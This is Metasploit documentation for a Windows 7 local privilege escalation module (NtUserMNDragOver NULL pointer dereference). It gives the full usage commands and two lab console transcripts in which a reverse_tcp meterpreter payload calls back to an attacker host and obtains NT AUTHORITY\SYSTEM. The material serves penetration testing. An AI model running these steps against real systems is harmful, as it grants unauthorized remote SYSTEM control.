documentation/modules/exploit/windows/local/ntusermndragover.md
This module exploits a NULL pointer dereference vulnerability in MNGetpItemFromIndex(), which is reachable via a NtUserMNDragOver() system call.
The NULL pointer dereference occurs because the xxxMNFindWindowFromPoint() function does not effectively check the validity of the tagPOPUPMENU objects it processes before passing them on to MNGetpItemFromIndex(), where the NULL pointer dereference will occur.
This module has been tested against Windows 7 x86 SP0 and SP1. Offsets within the solution may need to be adjusted to work with other versions of Windows, such as Windows Server 2008.
use exploit/windows/local/ntusermndragover
set session <session>
set payload windows/meterpreter/reverse_tcp
set LHOST <LHOST>
set LPORT 5555
exploit
msf exploit(multi/handler) > sessions
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 meterpreter x86/windows User-PC\User @ USER-PC 192.168.56.1:4444 -> 192.168.56.15:49158 (192.168.56.15)
msf exploit(multi/handler) > use exploit/windows/local/ntusermndragover
msf exploit(windows/local/ntusermndragover) > set session 1
session => 1
msf exploit(windows/local/ntusermndragover) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(windows/local/ntusermndragover) > set LHOST 192.168.56.1
LHOST => 192.168.56.1
msf exploit(windows/local/ntusermndragover) > set LPORT 5555
LPORT => 5555
msf exploit(windows/local/ntusermndragover) > run
[*] Started reverse TCP handler on 192.168.56.1:5555
[*] Executing automatic check (disable AutoCheck to override)
[+] The target appears to be vulnerable.
[+] Reflectively injecting the exploit DLL and running the exploit...
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
[*] Sending stage (176195 bytes) to 192.168.56.15
[*] Meterpreter session 2 opened (192.168.56.1:5555 -> 192.168.56.15:49159) at 2020-04-29 17:14:46 +0800
meterpreter > sysinfo
Computer : USER-PC
OS : Windows 7 (6.1 Build 7600).
Architecture : x86
System Language : en_GB
Domain : WORKGROUP
Logged On Users : 2
Meterpreter : x86/windows
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >
msf exploit(multi/handler) > sessions
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 meterpreter x86/windows User-PC\User @ USER-PC 192.168.56.1:4444 -> 192.168.56.5:49157 (192.168.56.5)
msf exploit(multi/handler) > use exploit/windows/local/ntusermndragover
msf exploit(windows/local/ntusermndragover) > set session 1
session => 1
msf exploit(windows/local/ntusermndragover) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(windows/local/ntusermndragover) > set LHOST 192.168.56.1
LHOST => 192.168.56.1
msf exploit(windows/local/ntusermndragover) > set LPORT 5555
LPORT => 5555
msf exploit(windows/local/ntusermndragover) > run
[*] Started reverse TCP handler on 192.168.56.1:5555
[*] Executing automatic check (disable AutoCheck to override)
[+] The target appears to be vulnerable.
[*] Launching notepad.exe to host the exploit...
[+] Process 2696 launched.
[*] Injecting exploit into 2696 ...
[*] Exploit injected. Injecting payload into 2696...
[*] Payload injected. Executing exploit...
[*] Sending stage (176195 bytes) to 192.168.56.5
[*] Meterpreter session 2 opened (192.168.56.1:5555 -> 192.168.56.5:49158) at 2020-04-29 17:18:00 +0800
meterpreter > sysinfo
Computer : USER-PC
OS : Windows 7 (6.1 Build 7601, Service Pack 1).
Architecture : x86
System Language : en_GB
Domain : WORKGROUP
Logged On Users : 2
Meterpreter : x86/windows
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >